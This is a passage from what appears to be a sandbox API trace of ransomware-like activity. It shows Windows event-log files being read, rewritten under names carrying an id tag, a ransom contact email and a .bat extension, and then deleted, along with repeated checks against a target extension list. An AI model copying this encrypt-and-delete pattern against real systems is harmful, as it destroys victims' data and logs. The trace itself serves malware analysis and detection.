SetFilePointerEx (in: hFile=0x32c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x334fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.233] SetEndOfFile (hFile=0x32c) returned 1 [0066.234] CloseHandle (hObject=0x32c) returned 1 [0066.234] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0066.234] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-ntfs%4operational.evtx")) returned 1 [0066.234] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx") returned 48 [0066.234] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx") returned 48 [0066.234] lstrlenW (lpString=".doc") returned 4 [0066.234] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0066.234] lstrlenW (lpString=".docx") returned 5 [0066.234] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0066.234] lstrlenW (lpString=".pdf") returned 4 [0066.234] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0066.234] lstrlenW (lpString=".xls") returned 4 [0066.234] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0066.234] lstrlenW (lpString=".xlsx") returned 5 [0066.234] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0066.234] lstrlenW (lpString=".ppt") returned 4 [0066.234] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0066.234] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx") returned 48 [0066.234] lstrlenW (lpString=".zip") returned 4 [0066.234] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0066.234] lstrlenW (lpString=".rar") returned 4 [0066.234] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0066.234] lstrlenW (lpString=".bz2") returned 4 [0066.235] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0066.235] lstrlenW (lpString=".7z") returned 3 [0066.235] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0066.235] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx") returned 48 [0066.235] lstrlenW (lpString=".dbf") returned 4 [0066.235] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0066.235] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx") returned 48 [0066.235] lstrlenW (lpString=".1cd") returned 4 [0066.235] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0066.235] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx") returned 48 [0066.235] lstrlenW (lpString=".jpg") returned 4 [0066.235] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0066.235] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx") returned 48 [0066.235] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx") returned 48 [0066.235] lstrlenW (lpString=".doc") returned 4 [0066.235] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0066.235] lstrlenW (lpString=".docx") returned 5 [0066.235] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0066.235] lstrlenW (lpString=".pdf") returned 4 [0066.235] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0066.235] lstrlenW (lpString=".xls") returned 4 [0066.235] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0066.235] lstrlenW (lpString=".xlsx") returned 5 [0066.235] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0066.235] lstrlenW (lpString=".ppt") returned 4 [0066.235] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0066.235] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx") returned 48 [0066.235] lstrlenW (lpString=".zip") returned 4 [0066.235] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0066.235] lstrlenW (lpString=".rar") returned 4 [0066.235] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0066.235] lstrlenW (lpString=".bz2") returned 4 [0066.235] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0066.235] lstrlenW (lpString=".7z") returned 3 [0066.235] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0066.236] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx") returned 48 [0066.236] lstrlenW (lpString=".dbf") returned 4 [0066.236] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0066.236] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx") returned 48 [0066.236] lstrlenW (lpString=".1cd") returned 4 [0066.236] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0066.236] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx") returned 48 [0066.236] lstrlenW (lpString=".jpg") returned 4 [0066.236] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0066.236] lstrcmpiW (lpString1=".evtx", lpString2=".bat") returned 1 [0066.236] lstrlenW (lpString="Microsoft-Windows-Ntfs%4WHC.evtx") returned 32 [0066.236] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx" (normalized: "c:\\logs\\microsoft-windows-ntfs%4whc.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0066.236] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x334ff14 | out: lpFileSize=0x334ff14*=69632) returned 1 [0066.236] CloseHandle (hObject=0x32c) returned 1 [0066.236] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx" (normalized: "c:\\logs\\microsoft-windows-ntfs%4whc.evtx")) returned 0x20 [0066.236] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-ntfs%4whc.evtx.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0066.236] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx" (normalized: "c:\\logs\\microsoft-windows-ntfs%4whc.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0066.237] SetFilePointerEx (in: hFile=0x32c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x334fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.237] SetFilePointerEx (in: hFile=0x32c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x334fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.237] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-ntfs%4whc.evtx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0066.237] GetLastError () returned 0x0 [0066.237] ReadFile (in: hFile=0x32c, lpBuffer=0x4026020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x334fecc, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesRead=0x334fecc*=0x11000, lpOverlapped=0x0) returned 1 [0067.252] WriteFile (in: hFile=0x394, lpBuffer=0x4026020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x334fc94, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesWritten=0x334fc94*=0x11010, lpOverlapped=0x0) returned 1 [0068.382] ReadFile (in: hFile=0x32c, lpBuffer=0x4026020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x334fecc, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesRead=0x334fecc*=0x0, lpOverlapped=0x0) returned 1 [0068.382] WriteFile (in: hFile=0x394, lpBuffer=0x4026020*, nNumberOfBytesToWrite=0x114, lpNumberOfBytesWritten=0x334fc94, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesWritten=0x334fc94*=0x114, lpOverlapped=0x0) returned 1 [0068.382] SetEndOfFile (hFile=0x394) returned 1 [0068.383] CloseHandle (hObject=0x394) returned 1 [0068.383] SetFilePointerEx (in: hFile=0x32c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x334fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.383] SetEndOfFile (hFile=0x32c) returned 1 [0068.385] CloseHandle (hObject=0x32c) returned 1 [0068.385] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0068.807] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx" (normalized: "c:\\logs\\microsoft-windows-ntfs%4whc.evtx")) returned 1 [0068.808] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx") returned 40 [0068.808] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx") returned 40 [0068.808] lstrlenW (lpString=".doc") returned 4 [0068.808] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0068.808] lstrlenW (lpString=".docx") returned 5 [0068.808] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0068.808] lstrlenW (lpString=".pdf") returned 4 [0068.808] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0068.808] lstrlenW (lpString=".xls") returned 4 [0068.808] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0068.808] lstrlenW (lpString=".xlsx") returned 5 [0068.808] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0068.808] lstrlenW (lpString=".ppt") returned 4 [0068.808] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0068.808] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx") returned 40 [0068.808] lstrlenW (lpString=".zip") returned 4 [0068.808] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0068.808] lstrlenW (lpString=".rar") returned 4 [0068.808] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0068.808] lstrlenW (lpString=".bz2") returned 4 [0068.808] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0068.808] lstrlenW (lpString=".7z") returned 3 [0068.809] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0068.809] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx") returned 40 [0068.809] lstrlenW (lpString=".dbf") returned 4 [0068.809] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0068.809] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx") returned 40 [0068.809] lstrlenW (lpString=".1cd") returned 4 [0068.809] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0068.809] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx") returned 40 [0068.809] lstrlenW (lpString=".jpg") returned 4 [0068.809] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0068.809] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx") returned 40 [0068.809] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx") returned 40 [0068.809] lstrlenW (lpString=".doc") returned 4 [0068.809] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0068.809] lstrlenW (lpString=".docx") returned 5 [0068.809] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0068.809] lstrlenW (lpString=".pdf") returned 4 [0068.809] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0068.809] lstrlenW (lpString=".xls") returned 4 [0068.809] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0068.809] lstrlenW (lpString=".xlsx") returned 5 [0068.809] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0068.809] lstrlenW (lpString=".ppt") returned 4 [0068.809] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0068.809] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx") returned 40 [0068.809] lstrlenW (lpString=".zip") returned 4 [0068.809] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0068.809] lstrlenW (lpString=".rar") returned 4 [0068.809] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0068.809] lstrlenW (lpString=".bz2") returned 4 [0068.809] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0068.809] lstrlenW (lpString=".7z") returned 3 [0068.809] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0068.809] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx") returned 40 [0068.809] lstrlenW (lpString=".dbf") returned 4 [0068.809] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0068.810] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx") returned 40 [0068.810] lstrlenW (lpString=".1cd") returned 4 [0068.810] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0068.810] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx") returned 40 [0068.810] lstrlenW (lpString=".jpg") returned 4 [0068.810] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0068.810] lstrcmpiW (lpString1=".evtx", lpString2=".bat") returned 1 [0068.810] lstrlenW (lpString="Microsoft-Windows-UserPnp%4ActionCenter.evtx") returned 44 [0068.810] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx" (normalized: "c:\\logs\\microsoft-windows-userpnp%4actioncenter.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0068.810] GetFileSizeEx (in: hFile=0x354, lpFileSize=0x334ff14 | out: lpFileSize=0x334ff14*=69632) returned 1 [0068.810] CloseHandle (hObject=0x354) returned 1 [0068.811] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx" (normalized: "c:\\logs\\microsoft-windows-userpnp%4actioncenter.evtx")) returned 0x20 [0068.811] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-userpnp%4actioncenter.evtx.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0068.811] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx" (normalized: "c:\\logs\\microsoft-windows-userpnp%4actioncenter.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0068.811] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x334fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.811] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x334fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.811] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-userpnp%4actioncenter.evtx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0068.812] GetLastError () returned 0x0 [0068.812] ReadFile (in: hFile=0x354, lpBuffer=0x4026020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x334fecc, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesRead=0x334fecc*=0x11000, lpOverlapped=0x0) returned 1 [0068.814] WriteFile (in: hFile=0x32c, lpBuffer=0x4026020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x334fc94, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesWritten=0x334fc94*=0x11010, lpOverlapped=0x0) returned 1 [0068.815] ReadFile (in: hFile=0x354, lpBuffer=0x4026020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x334fecc, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesRead=0x334fecc*=0x0, lpOverlapped=0x0) returned 1 [0068.815] WriteFile (in: hFile=0x32c, lpBuffer=0x4026020*, nNumberOfBytesToWrite=0x12c, lpNumberOfBytesWritten=0x334fc94, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesWritten=0x334fc94*=0x12c, lpOverlapped=0x0) returned 1 [0068.815] SetEndOfFile (hFile=0x32c) returned 1 [0068.815] CloseHandle (hObject=0x32c) returned 1 [0068.816] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x334fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.816] SetEndOfFile (hFile=0x354) returned 1 [0068.817] CloseHandle (hObject=0x354) returned 1 [0068.817] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0068.817] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx" (normalized: "c:\\logs\\microsoft-windows-userpnp%4actioncenter.evtx")) returned 1 [0068.817] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx") returned 52 [0068.817] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx") returned 52 [0068.817] lstrlenW (lpString=".doc") returned 4 [0068.817] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0068.817] lstrlenW (lpString=".docx") returned 5 [0068.817] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0068.817] lstrlenW (lpString=".pdf") returned 4 [0068.817] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0068.817] lstrlenW (lpString=".xls") returned 4 [0068.817] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0068.817] lstrlenW (lpString=".xlsx") returned 5 [0068.817] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0068.817] lstrlenW (lpString=".ppt") returned 4 [0068.817] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0068.817] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx") returned 52 [0068.818] lstrlenW (lpString=".zip") returned 4 [0068.818] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0068.818] lstrlenW (lpString=".rar") returned 4 [0068.818] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0068.818] lstrlenW (lpString=".bz2") returned 4 [0068.818] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0068.818] lstrlenW (lpString=".7z") returned 3 [0068.818] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0068.818] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx") returned 52 [0068.818] lstrlenW (lpString=".dbf") returned 4 [0068.818] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0068.818] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx") returned 52 [0068.818] lstrlenW (lpString=".1cd") returned 4 [0068.818] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0068.818] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx") returned 52 [0068.818] lstrlenW (lpString=".jpg") returned 4 [0068.818] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0068.818] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx") returned 52 [0068.818] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx") returned 52 [0068.818] lstrlenW (lpString=".doc") returned 4 [0068.818] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0068.818] lstrlenW (lpString=".docx") returned 5 [0068.818] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0068.818] lstrlenW (lpString=".pdf") returned 4 [0068.818] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0068.818] lstrlenW (lpString=".xls") returned 4 [0068.818] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0068.818] lstrlenW (lpString=".xlsx") returned 5 [0068.818] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0068.818] lstrlenW (lpString=".ppt") returned 4 [0068.818] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0068.819] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx") returned 52 [0068.819] lstrlenW (lpString=".zip") returned 4 [0068.819] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0068.819] lstrlenW (lpString=".rar") returned 4 [0068.819] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0068.819] lstrlenW (lpString=".bz2") returned 4 [0068.819] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0068.819] lstrlenW (lpString=".7z") returned 3 [0068.819] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0068.819] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx") returned 52 [0068.819] lstrlenW (lpString=".dbf") returned 4 [0068.819] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0068.819] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx") returned 52 [0068.819] lstrlenW (lpString=".1cd") returned 4 [0068.819] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0068.819] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx") returned 52 [0068.819] lstrlenW (lpString=".jpg") returned 4 [0068.819] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0068.819] lstrcmpiW (lpString1=".evtx", lpString2=".bat") returned 1 [0068.819] lstrlenW (lpString="Microsoft-Windows-UserPnp%4DeviceInstall.evtx") returned 45 [0068.819] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx" (normalized: "c:\\logs\\microsoft-windows-userpnp%4deviceinstall.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0068.819] GetFileSizeEx (in: hFile=0x354, lpFileSize=0x334ff14 | out: lpFileSize=0x334ff14*=69632) returned 1 [0068.819] CloseHandle (hObject=0x354) returned 1 [0068.820] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx" (normalized: "c:\\logs\\microsoft-windows-userpnp%4deviceinstall.evtx")) returned 0x20 [0068.820] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-userpnp%4deviceinstall.evtx.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0068.820] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx" (normalized: "c:\\logs\\microsoft-windows-userpnp%4deviceinstall.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0068.820] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x334fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.820] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x334fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.820] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-userpnp%4deviceinstall.evtx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0068.820] GetLastError () returned 0x0 [0068.820] ReadFile (in: hFile=0x354, lpBuffer=0x4026020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x334fecc, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesRead=0x334fecc*=0x11000, lpOverlapped=0x0) returned 1 [0068.822] WriteFile (in: hFile=0x32c, lpBuffer=0x4026020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x334fc94, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesWritten=0x334fc94*=0x11010, lpOverlapped=0x0) returned 1 [0068.824] ReadFile (in: hFile=0x354, lpBuffer=0x4026020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x334fecc, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesRead=0x334fecc*=0x0, lpOverlapped=0x0) returned 1 [0068.824] WriteFile (in: hFile=0x32c, lpBuffer=0x4026020*, nNumberOfBytesToWrite=0x12e, lpNumberOfBytesWritten=0x334fc94, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesWritten=0x334fc94*=0x12e, lpOverlapped=0x0) returned 1 [0068.824] SetEndOfFile (hFile=0x32c) returned 1 [0068.824] CloseHandle (hObject=0x32c) returned 1 [0068.824] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x334fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.824] SetEndOfFile (hFile=0x354) returned 1 [0068.826] CloseHandle (hObject=0x354) returned 1 [0068.826] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0068.826] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx" (normalized: "c:\\logs\\microsoft-windows-userpnp%4deviceinstall.evtx")) returned 1 [0068.826] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx") returned 53 [0068.826] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx") returned 53 [0068.826] lstrlenW (lpString=".doc") returned 4 [0068.826] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0068.826] lstrlenW (lpString=".docx") returned 5 [0068.826] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0068.826] lstrlenW (lpString=".pdf") returned 4 [0068.826] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0068.826] lstrlenW (lpString=".xls") returned 4 [0068.826] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0068.826] lstrlenW (lpString=".xlsx") returned 5 [0068.826] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0068.826] lstrlenW (lpString=".ppt") returned 4 [0068.826] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0068.826] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx") returned 53 [0068.827] lstrlenW (lpString=".zip") returned 4 [0068.827] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0068.827] lstrlenW (lpString=".rar") returned 4 [0068.827] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0068.827] lstrlenW (lpString=".bz2") returned 4 [0068.827] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0068.827] lstrlenW 